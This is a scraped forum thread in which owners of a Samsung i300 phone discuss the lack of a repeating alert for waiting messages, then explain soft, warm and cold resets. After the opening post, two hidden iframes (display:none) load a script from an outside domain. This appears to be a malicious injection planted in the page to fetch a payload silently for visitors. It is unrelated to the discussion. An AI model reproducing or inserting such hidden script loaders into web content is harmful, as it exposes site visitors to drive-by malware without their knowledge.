+ Reply to Thread
    art

no message alert

Hello Friends,

Is anyone having problems with a message alert. I have messages waiting for me but the only way to find out is if I turn on the screen. There is no alarm or flashing light letting me know that there is a message. Am I missing somthing or is that just the way it is?

art<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This and similar problems can be solved with a warm reset (or whatever the term is). Press the recessed reset button and hold it, press and hold the UP button on the face of the machine, release the reset button, then release the up button. This will not erase your data.

I had this problem, and various problems with calls not being logged, and this corrected it.

...I should add that the alarm and the flashing light is only when the message first comes in; it doesn't continue to signal. But you can always tell when you have a message from the small LCD display on the top of the unit.

art

thanks

thanks harangutan.......I was hoping there would be an alarm or somthing every 5 mins or so. Oh well, they really left out a lot of features that are common on other phones. Dont get me wrong I still love my I300.

Art

Harangutan;

what is the warm reset exactly? I just tried that on my I300 because mine wouldnt show the data calls in the outgoing calls list. For some reason, when I perform the "warm" reset, the phone resets normally, and I go to "Prefs" and a message comes up that reads, "Network Error: The network library is not available." If I try to dial out thru blazer or eudora, I get a connectoin error message. If I launch SprintWeb, I immediately get a "Fatal Alert: upapp.c, Line:3471, Fatal err! failed to register the sysNotifySleepRequestEvent" message, with the "reset" button. I hit reset, and I get access back to my network library thru prefs, and all internet programs are able to dial out, but I am unable to view data calls in the outgoing list once again. Weird...how come I never saw instructions on a "warm" reset in the manual? Or did i just miss it? thanks...

Administrator

Arrow

in regards to resets, there are 3 types: soft, warm and cold.

a warm reset is performed by holding the up scroll-button while pressing the reset button. This goes the extra step of deactivating any system patches or hacks which may be installed. nothing is erased from memory. you can then delete, adjust, or whatever to the suspected offending program.

a cold reset wil kill all of your apps and anything else you have installed personally. thisd is done by pushing the reset while holding the phone icon button. release the pin but continue holding the phone icon button.. then release it and you will geta messgae asking you to "erase all data?" press the up button on the PALM part (not on the side) for yes and the down button for no.

if you ever need to do a cold reset, then please get the palm desktop 4.0.1 . this will save your user-installed apps and such. the 3.1 version thats on the CD wont do this..

probably you did not do a warm reset, just a soft...

Re: thanks

Originally posted by art
    thanks harangutan.......I was hoping there would be an alarm or somthing every 5 mins or so. Oh well, they really left out a lot of features that are common on other phones. Dont get me wrong I still love my I300.

Art
    Hey Art, this is my biggest pet peave with the phone. It would be nice to have a beep every 5 minutes or so. You are correct, most phones do this. It kind of pisses me off and makes the phone less useful as a pager as well. But the rest of my i300 I like, so I guess you have to take the good with the bad. My other 2 peaves are battery life (which seems to be fixed with the extended battery (getting 3-4 days now), and not being about to leave the screen ON, if you are connected to an external power source. Seems like the Samsung people would have looked at the 6035 and taken all the great features from that phone. Oh well, can't have everything in life..... can we?
    Carl

JLF

Unhappy Agree - they missed a key feature

It is unconscionable to me that they left this message reminder beep out of this phone ! It is also one of my top 3 pet peeves ...

Worth starting a letter writing revolution over? I missed a page yesterday because of this feature.
    Carl